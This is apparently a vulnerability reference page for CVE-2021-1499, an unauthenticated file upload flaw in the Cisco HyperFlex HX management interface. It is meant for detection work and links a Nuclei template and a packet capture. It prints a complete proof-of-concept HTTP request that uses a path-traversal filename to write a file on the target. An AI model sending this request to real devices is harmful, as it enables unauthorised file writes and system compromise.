🔙 목록으로 돌아가기

CVE-2021-1499: Cisco HyperFlex HX Data Platform - Arbitrary File Upload

TitleCisco HyperFlex HX Data Platform - Arbitrary File Upload
Authorgy741
SeverityMedium
ImpactAllows an attacker to upload and execute arbitrary files on the target system
RemediationApply the necessary security patches or updates provided by Cisco
CVSS Score5.3
EPSS Score0.9197
CVE IDCVE-2021-1499
CWE IDCWE-306
Tags cve2021 cve fileupload intrusive packetstorm cisco vuln

🔍 Vulnerability Description

Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.

🌐 HTTP Request

POST /upload HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Content-Length: 274
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
Origin: /
Referer: /

-----------------------------253855577425106594691130420583

Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"

Content-Type: application/json



MyPasswdNewData->/api/tomcat



-----------------------------253855577425106594691130420583--

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-1499.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-1499.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A